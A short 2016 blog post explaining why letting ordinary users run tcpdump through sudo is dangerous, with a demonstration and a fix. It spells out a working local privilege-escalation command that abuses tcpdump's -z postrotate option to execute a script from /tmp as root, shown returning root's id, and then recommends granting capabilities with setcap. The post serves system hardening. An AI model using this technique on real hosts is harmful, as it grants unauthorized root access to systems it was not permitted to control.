Wednesday, April 6, 2016

Why sudo tcpdump is dangerous

Do you have Linux hosts with non privileged users allowed to run tcpdump by placing tcpdump in the sudoers file? There’s a tcpdump –z flag that allow you to specify a post-rotate command to run. The user can create a text file in /tmp with commands that will be executed as root.

Although this isn't a newly discovered hack, it bears repeating because of the fact that this is still seen in production environments.

$ sudo -l
[sudo] password for john:
User john may run the following commands on this host:
    (root) /usr/sbin/tcpdump

-z postrotate-command
Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.

A way to test this is to create a file… /tmp/.test and place the “id” command in it then run the command: “sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root”

It will output:
uid=0(root) gid=0(root) groups=0(root)

The way to fix this:
With the following commands we can run Tcpdump as a normal user instead of a root user.

setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump